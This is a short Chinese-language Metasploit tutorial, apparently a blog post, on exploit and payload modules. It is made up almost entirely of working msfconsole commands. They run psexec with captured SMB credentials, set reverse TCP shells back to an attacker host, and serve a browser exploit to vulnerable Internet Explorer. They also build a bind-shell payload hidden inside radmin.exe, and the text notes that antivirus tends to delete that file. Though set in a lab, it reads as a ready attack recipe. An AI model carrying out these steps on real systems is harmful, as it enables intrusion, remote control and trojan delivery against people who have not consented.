exploit和payload模块

Exploit模块

RHOST远程主机,LHOST本地主机

1.active,受害者的服务存在漏洞,攻击者主动向受害者发送漏洞利用代码。

实例:exploit/windows/smb/psexec

适用场景:攻击者获取到了受害者的账号和密码,但是受害者机器上没有开放Telnet,远程桌面等服务。

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost 192.168.80.150

msf exploit(psexec) > set smbuser coler

msf exploit(psexec) > set smbpass 123456

msf exploit(psexec) > set payload windows/shell/reverse_tcp

msf exploit(psexec) > set lhost 192.168.80.163

msf exploit(psexec) > exploit -j

msf exploit(handler) > sessions -u 1 将shell提升到meterpreter类型的shell


2.passive,受害者的客户端程序存在漏洞,攻击者诱使受害者使用存在漏洞的客户端程序,访问自己构建好的 存在漏洞利用代码的服务端程序。

实例:exploit/windows/browser/ms07_017_ani_loadimage_chunksize

msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

msf exploit(ms07_017_ani_loadimage_chunksize) > set srvhost 192.168.80.163

msf exploit(ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp

msf exploit(ms07_017_ani_loadimage_chunksize) > set lhost 192.168.80.163

msf exploit(ms07_017_ani_loadimage_chunksize) > exploit

在存在漏洞的IE浏览器上访问http://192.168.80.163/,攻击者会得到受害者的shell。


Payload模块

msf > use payload/windows/shell_bind_tcp

msf payload(shell_bind_tcp) > generate -b '\x00'  过滤坏字符(实际是使用encoders模块将坏字符编码)

msf payload(shell_bind_tcp) > generate -b '\x00\xff' -t exe -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f 123.exe  将payload绑定到radmin.exe中

在靶机上运行123.exe,然后在攻击机上连接靶机的4444端口,会获得靶机的shell。

root@kali:/usr/share/windows-binaries# nc 192.168.80.11 4444


补充:有时将绑定payload的执行程序拷贝到物理机上,会被物理机的杀毒软件杀掉,可以先开启msf的Apache服务,将exe程序放在/var/www/html目录下,然后通过虚拟机直接访问下载。

root@kali:~# service apache2 start

root@kali:~# cp 123.exe /var/www/html/

你可能感兴趣的:(exploit和payload模块)